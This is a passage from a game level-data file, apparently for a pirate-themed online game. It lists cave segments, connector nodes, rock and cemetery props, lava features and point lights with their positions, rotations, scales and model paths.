'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611528.14akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(175.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.14akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611528.78akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611528.8akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611528.78akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611616.73akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611528.78akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584384.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(-178.434, 0.0, 0.0),'Pos': Point3(-0.38, -77.135, 0.0),'Scale': VBase3(1.313, 1.313, 1.313),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237595008.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-118.503, 0.0, 0.0),'Pos': Point3(-11.756, -77.379, -6.813),'Scale': VBase3(1.463, 1.463, 1.463),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237595136.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(102.858, 4.169, 0.0),'Pos': Point3(19.491, -73.43, -2.133),'Scale': VBase3(1.076, 1.076, 1.076),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}}},'Pos': Point3(75.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.78akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611529.42akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611529.44akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611529.42akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611626.7akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611529.42akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584384.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(119.654, 0.0, 0.0),'Pos': Point3(50.552, -62.319, -0.678),'Scale': VBase3(2.38, 2.38, 2.38),'VisSize': 'Large','VisZone': '2_1235611529.42akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_pool_lavaB'}}},'Pos': Point3(75.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.78akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200'}},'1235611530.08akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611530.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611530.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611650.22akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611530.08akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1238121988.24kmuller': {'Type': 'Light - Modular','ConeAngle': '15.0000','ConstantAttenuation': '0.0843','DropOff': '0.0000','Hpr': Point3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0199','Pos': Point3(-4.061, -96.926, 41.306),'QuadraticAttenuation': '0.0000','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.83, 0.38, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238123063.16kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-165.326, 0.0, 0.0),'Pos': Point3(78.695, -56.225, 0.915),'Scale': VBase3(1.225, 1.225, 1.225),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_lavafall'}}},'Pos': Point3(-325.0, 175.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611530.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200_lava'}},'1235611530.73akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(630.0, 0.0, 0.0),'Objects': {'1235611530.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611530.73akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611680.64akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611530.73akelts','Pos': Point3(150.0, -150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584256.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(52.016, -3.134, -17.245),'Pos': Point3(76.351, -67.013, -3.998),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1237584256.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.316, 0.0, 0.0),'Pos': Point3(-7.118, -47.752, -5.201),'Scale': VBase3(6.769, 6.769, 8.069),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1237587968.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(-55.429, -222.436, -43.219),'Scale': VBase3(2.334, 2.334, 3.075),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1238122450.62kmuller': {'Type': 'Light - Modular','ConeAngle': '73.8253','ConstantAttenuation': '0.0000','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0163','Pos': Point3(-54.874, -225.144, 53.805),'QuadraticAttenuation': '0.0783','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.0, 1.0, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238122549.4kmuller': {'Type': 'Light - Modular','ConeAngle': '15.0000','ConstantAttenuation': '0.0000','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0000','Pos': Point3(33.791, -131.068, 28.758),'QuadraticAttenuation': '0.2048','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.0, 1.0, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238125045.1kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(72.809, 0.0, -13.181),'Pos': Point3(42.658, -210.918, -39.702),'Scale': VBase3(0.545, 0.545, 0.545),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_big'}},'1238125152.02kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(130.354, 0.0, 0.0),'Pos': Point3(-65.841, -141.727, -56.865),'Scale': VBase3(3.149, 3.149, 3.149),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}}},'Pos': Point3(-175.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveWide_vista'}},'1235611531.39akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611531.41akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611531.39akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611692.63akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611531.39akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611532.06akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611532.08akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611704.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611704.77akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237828348.45akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-26.433, -7.306, -5.912),'Scale': VBase3(1.175, 1.175, 1.547),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1237828366.56akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.228, 0.0, 0.0),'Pos': Point3(29.798, -11.099, -6.634),'Scale': VBase3(1.53, 1.53, 2.016),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-75.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611531.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611532.73akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611532.73akelts0': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611532.73akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-25.0, 275.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611532.06akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611533.41akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611533.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611533.41akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611724.3akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611533.41akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-25.0, 475.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611533.41akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611534.09akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611534.11akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611534.09akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611556.56akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611534.09akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827104.49akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(37.614, 0.0, 0.0),'Pos': Point3(-17.746, -76.489, -1.117),'Scale': VBase3(0.813, 0.813, 0.813),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}}},'Pos': Point3(350.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow100'}},'1235611746.08akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611746.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611746.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611746.11akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611746.08akelts','Pos': Point3(0.0, -150.0, 42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237828412.73akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-72.82, 0.0, -14.517),'Pos': Point3(28.186, -106.422, 27.898),'Scale': VBase3(1.062, 1.062, 1.062),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(-25.0, 625.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611746.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWideAscend'}},'1235611775.94akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611775.95akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611775.94akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611815.78akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611775.94akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594112.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-39.722, -5.564, -180.0),'Pos': Point3(-126.354, -153.401, 44.422),'Scale': VBase3(1.368, 1.368, 1.368),'VisSize': 'Large','VisZone': '2_1235611775.94akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-350.0, -450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611775.94akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611777.48akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611777.5akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611842.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611842.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594112.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-103.459, 0.0, 0.0),'Pos': Point3(-17.249, -68.361, -3.554),'Scale': VBase3(0.687, 0.687, 0.687),'VisSize': 'Large','VisZone': '2_1235611777.48akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(-300.0, -500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611777.48akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611781.22akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611781.23akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611781.22akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-250.0, -550.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611777.48akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611782.08akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611782.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611782.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611872.81akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611782.08akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611782.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611783.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611783.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611883.44akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611883.47akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237583872.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(-140.552, 0.0, 0.0),'Pos': Point3(21.304, -69.001, -0.143),'Scale': VBase3(1.451, 1.451, 1.451),'VisSize': 'Large','VisZone': '2_1235611783.0akelts','Visual': {'Model': 'models/props/crypt1'}},'1237584000.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.588, 0.0, 0.0),'Pos': Point3(-45.632, -49.635, -0.126),'Scale': VBase3(1.525, 1.525, 1.525),'VisSize': 'Large','VisZone': '1_1235611783.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237593856.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-26.344, 0.0, 0.0),'Pos': Point3(-47.515, -63.552, -2.58),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611783.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-125.0, -775.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611783.89akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611783.91akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611783.89akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611892.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611783.89akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237583872.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(175.605, 0.0, 0.0),'Pos': Point3(-0.656, -83.64, -0.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611783.89akelts','Visual': {'Model': 'models/props/crypt2'}}},'Pos': Point3(-175.0, -825.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.89akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611784.77akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611784.78akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611784.77akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611856.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611784.77akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-200.0, -400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611784.77akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611785.67akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611785.69akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611785.67akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, -825.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.89akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611786.56akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(630.0, 0.0, 0.0),'Objects': {'1235611786.58akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611786.56akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611907.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611786.56akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593728.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-179.06, 0.0, 0.0),'Pos': Point3(20.607, -103.261, 0.069),'Scale': VBase3(0.653, 0.898, 0.966),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(25.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611786.56akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611787.47akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611787.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611825.73akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611825.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593984.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-0.121, 0.0, 0.0),'Pos': Point3(28.728, -26.785, -2.419),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237593984.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-143.274, 0.0, 0.0),'Pos': Point3(10.326, -78.165, -10.588),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237593984.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-39.722, 0.0, 0.0),'Pos': Point3(-27.865, -21.438, -1.009),'Scale': VBase3(1.368, 1.368, 1.368),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-300.0, -500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611777.48akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611788.39akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611788.41akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611917.53akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611917.55akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(-100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593600.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-34.219, 0.0, 0.0),'Pos': Point3(90.881, -133.889, 0.66),'Scale': VBase3(1.536, 1.536, 2.272),'VisSize': 'Large','VisZone': '3_1235611788.39akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(125.0, -625.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611788.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway200_lava'}},'1235611789.31akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611789.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611789.31akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611926.59akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611789.31akelts','Pos': Point3(150.0, -150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(225.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611789.31akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveWide_ravine_lava'}},'1235611790.25akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611790.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611790.25akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611941.53akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611790.25akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': 